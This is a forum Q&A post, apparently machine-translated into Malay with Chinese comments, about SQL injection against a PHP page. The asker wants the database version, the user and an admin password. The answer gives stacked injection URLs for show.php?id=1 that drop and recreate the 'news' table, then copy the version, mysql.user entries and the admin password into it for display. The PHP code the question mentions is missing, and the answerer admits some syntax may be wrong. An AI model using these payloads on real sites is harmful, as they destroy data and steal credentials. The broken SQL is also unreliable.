php - Soalan mengenai suntikan sql

Question

Ada sekeping kod php sedemikian

Sila beritahu saya cara menggunakan skrip untuk menanya versi pangkalan data, pengguna pangkalan data dan kandungan kata laluan dengan medan 1

Answer 1

Anda tahu, jika saya, saya mungkin cuba melakukan ini. . .
Suntikan SQL hanya memerlukan beberapa prinsip mudah. . .
Saya telah melupakan semua sintaks SQL. . . Jika tatabahasa salah, semak tatabahasa itu sendiri dan betulkan. . .

# 获得数据库版本
show.php?id=1;drop table news; create table news(title char(1024),id int); insert into news values(select version(), 1);
show.php?id=1

# 获取数据库用户
show.php?id=1;drop table news; create table news(title char(1024), id int); select user,1 from mysql.user into news;
show.php?id=1

# 获取表admin ID为1字段password的内容
show.php?id=1;drop table news; create table news(title char(1024), id int); select password, 1 from admin where id = 1 into news;
show.php?id=1

Betul. . Secara umumnya, jangan lakukannya dengan cemerlang. . .
Namakan semula berita asal Selepas menyemak semua maklumat, padamkan berita yang tidak berguna dan namakan semula. . . Tetapi saya terlupa penyataan nama semula. . .